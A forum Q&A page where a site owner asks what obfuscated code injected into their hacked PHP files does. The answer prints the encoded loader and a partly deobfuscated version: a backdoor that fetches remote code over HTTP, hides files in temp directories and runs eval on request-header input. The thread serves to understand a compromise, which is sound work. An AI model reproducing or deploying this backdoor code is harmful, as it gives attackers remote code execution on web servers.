发表新帖
发表新帖

My server was hacked a encoded code was injected. i was not able to know what was the purpose of this code ? Please anybody help me

前端 未结
关注
2 374
醉梦人生
醉梦人生 2020-12-18 08:32

my php files were hacked and some one injected some encoded text in my files. Can any body help my to understand what this code is actually doing. i am not able to decode th

2条回答
  • 执笔经年
    执笔经年 (楼主)
    2020-12-18 09:10

    Starts like this:

    $II11 = 110426;
if (!function_exists('I11lIl1I')) {
    $GLOBALS['II11'] =   'PAYLOAD';

    function I11lIl1I($a, $b) {
        $c = $GLOBALS['II11'];
        $d = pack('H*', '6261736536345f6465636f' . '6465');
        return $d(substr($c, $a, $b));
    };
    $QO0000QQ0 = I11lIl1I(3374, 16);
    $QO0000QQ0("/Q0QO00QOO/e", I11lIl1I(507, 2862), "Q0QO00QOO");
};

    Witch turns into this:

    if (!defined("determinator")) {
    if (function_exists(I11lIl1I(1, 10))) {
        @ini_set(I11lIl1I(14, 20), 1);
        @ini_set(I11lIl1I(34, 19), 0);
    }

    function w3net_feof($Q0OOOQ, &$I1lI1I = NULL) {
        $I1lI1I = microtime(true);
        return feof($Q0OOOQ);
    }

    function w3net_getfile($I1ll11, $I11IIl) {
        $IIlI1I = "curl";
        $I1IIll = $IIlI1I . "_init";
        if (@ini_get("allow_url_fopen") == "1") {
            return @file_get_contents("http://" . $I1ll11 . $I11IIl . "&w=fgc");
        } elseif (function_exists($I1IIll)) {
            $QO00QO = @$I1IIll();
            $QOOOQQ = $IIlI1I . "_setopt";
            $IIl11I = $IIlI1I . "_exec";
            @$QOOOQQ($QO00QO, CURLOPT_URL, "http://" . $I1ll11 . $I11IIl . "&w=cu");
            @$QOOOQQ($QO00QO, CURLOPT_HEADER, false);
            @$QOOOQQ($QO00QO, CURLOPT_RETURNTRANSFER, true);
            @$QOOOQQ($QO00QO, CURLOPT_CONNECTTIMEOUT, 6);
            $IIIl1I = @$IIl11I($QO00QO);
            @curl_close($QO00QO);
            if (empty($IIIl1I)) {
                $IIIl1I = "";
            } return $IIIl1I;
        } else {
            $Q0OOOQ = @fsockopen($I1ll11, 80, $Il111l, $Q000O0, 5);
            if ($Q0OOOQ) {
                $I111lI = "";
                $I1lI1I = NULL;
                @fputs($Q0OOOQ, "GET {$I11IIl}" . "&w=sk HTTP/1.0" . "\r\n" . "Host: " . "{$I1ll11}\r\n");
                $QOOOQO = PHP_OS . "/" . PHP_VERSION;
                @fputs($Q0OOOQ, "User-Agent: {$QOOOQO}\r\n\r\n");
                while (!w3net_feof($Q0OOOQ, $I1lI1I) && (microtime(true) - $I1lI1I) < 2) {
                    $I111lI .= @fgets($Q0OOOQ, 128);
                } @fclose($Q0OOOQ);
                $Q000OQ = explode("\r\n\r\n", $I111lI);
                unset($Q000OQ[0]);
                return implode("\r\n\r\n", $Q000OQ);
            }
        }
    }

    function w3net_output($I1I1lI, $I1lIll) {
        echo "Y_" . $I1I1lI . ":" . $I1lIll . "\r\n";
    }

    function php_server($Q0000Q) {
        return @$_SERVER[$Q0000Q];
    }

$IlI11l = I11lIl1I(55, 14);
    $I1lll1 = I11lIl1I(69, 6);
    $Q0Q0QO = I11lIl1I(78, 23);
    $I1ll11 = I11lIl1I(102, 10);
    if (isset($_SERVER[I11lIl1I(114, 7)])) {
        if (@$_SERVER[I11lIl1I(114, 7)] != I11lIl1I(122, 4)) {
            $I1ll11 = I11lIl1I(130, 11);
        }
    } $I1ll11.=strtolower(@$_SERVER[I11lIl1I(142, 12)]);
    foreach ($_GET as $I1I1lI => $I1lIll) {
        if (strpos($I1lIll, I11lIl1I(157, 7))) {
            $_GET[$I1I1lI] = I11lIl1I(167, 0);
        } elseif (strpos($I1lIll, I11lIl1I(167, 8))) {
            $_GET[$I1I1lI] = I11lIl1I(167, 0);
        }
    } if (!isset($_SERVER[I11lIl1I(175, 15)])) {
        $_SERVER[I11lIl1I(175, 15)] = @$_SERVER[I11lIl1I(190, 15)];
        if (isset($_SERVER[I11lIl1I(211, 16)])) {
            $_SERVER[I11lIl1I(175, 15)] .= I11lIl1I(231, 2) . @$_SERVER[I11lIl1I(211, 16)];
        }
    }

    function get_temp_directory() {
        $I11III = dirname(__FILE__) . DIRECTORY_SEPARATOR;
        $Q0Q00Q = Array("/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $I11III . "tmp", $I11III . "wp-content/uploads", $I11III . "wp-content/cache",);
        foreach ($Q0Q00Q as $Q0QOOO) {
            if (!empty($Q0QOOO)) {
                $Q0QOOO.=DIRECTORY_SEPARATOR;
                if (@is_writable($Q0QOOO)) {
                    $I11III = $Q0QOOO;
                    break;
                }
            }
        } return $I11III;
    }

if (strlen($I1ll11) < 10) {
        define(I11lIl1I(235, 16), 0);
    } elseif ($Q0OO0O = $I1ll11 . @$_SERVER[I11lIl1I(175, 15)]) {
        $QO0O0Q = @md5($I1ll11 . PHP_OS . $I1lll1 . $Q0Q0QO);
        $w3n_code = get_temp_directory() . I11lIl1I(253, 2) . $QO0O0Q;
        define(I11lIl1I(235, 16), $w3n_code);
        $IlIlII = $w3n_code . I11lIl1I(257, 6);
        if (@$_SERVER[I11lIl1I(267, 15)] == $QO0O0Q) {
            $QO0QQ0 = I11lIl1I(282, 18);
            echo "\r\n";
            w3net_output(I11lIl1I(301, 8), $I1lll1 . I11lIl1I(310, 2) . $IlI11l . I11lIl1I(314, 6));
            if ($Q00OQO = $QO0QQ0(@$_SERVER[I11lIl1I(321, 16)])) {
                @eval($Q00OQO);
                echo "\r\n";
                w3net_output(I11lIl1I(338, 4), I11lIl1I(342, 3));
            } exit(0);
        } $II11l1 = False;
        $Il11I1 = @strtolower(@$_SERVER[I11lIl1I(346, 20)]);
        foreach (explode(I11lIl1I(366, 2), I11lIl1I(371, 54)) as $QOOQOO) {
            if (strpos($Il11I1, $QOOQOO) !== False) {
                $Il1Il1 = @fopen($w3n_code . I11lIl1I(257, 6), I11lIl1I(430, 2));
                $Ill11I = @urlencode(@$_SERVER[I11lIl1I(175, 15)]);
                @fwrite($Il1Il1, time() . "\t" . $QOOQOO . "\t" . $Ill11I . "\n");
                @fclose($Il1Il1);
                $II11l1 = True;
                break;
            }
        } if (@is_file($w3n_code)) {
            @touch($w3n_code);
            @include_once($w3n_code);
        } elseif ($II11l1 === True) {
            $I1Il1I = Array(I11lIl1I(435, 12), I11lIl1I(449, 16));
            if (@touch($w3n_code)) {
                $Q0OO0O = @urlencode($Q0OO0O);
                $I11IIl = I11lIl1I(465, 14) . $Q0OO0O . I11lIl1I(482, 4) . $QO0O0Q . I11lIl1I(487, 12) . $IlI11l . I11lIl1I(503, 4) . $I1lll1;
                $QOQOQO = w3net_getfile($I1Il1I[0], $I11IIl);
                @touch($w3n_code);
            }
        }
    } else {
        define(I11lIl1I(235, 16), 1);
    }
}

    After that who knows. Happy hunting

    0 讨论(0)
 看不清?
提交回复
热议问题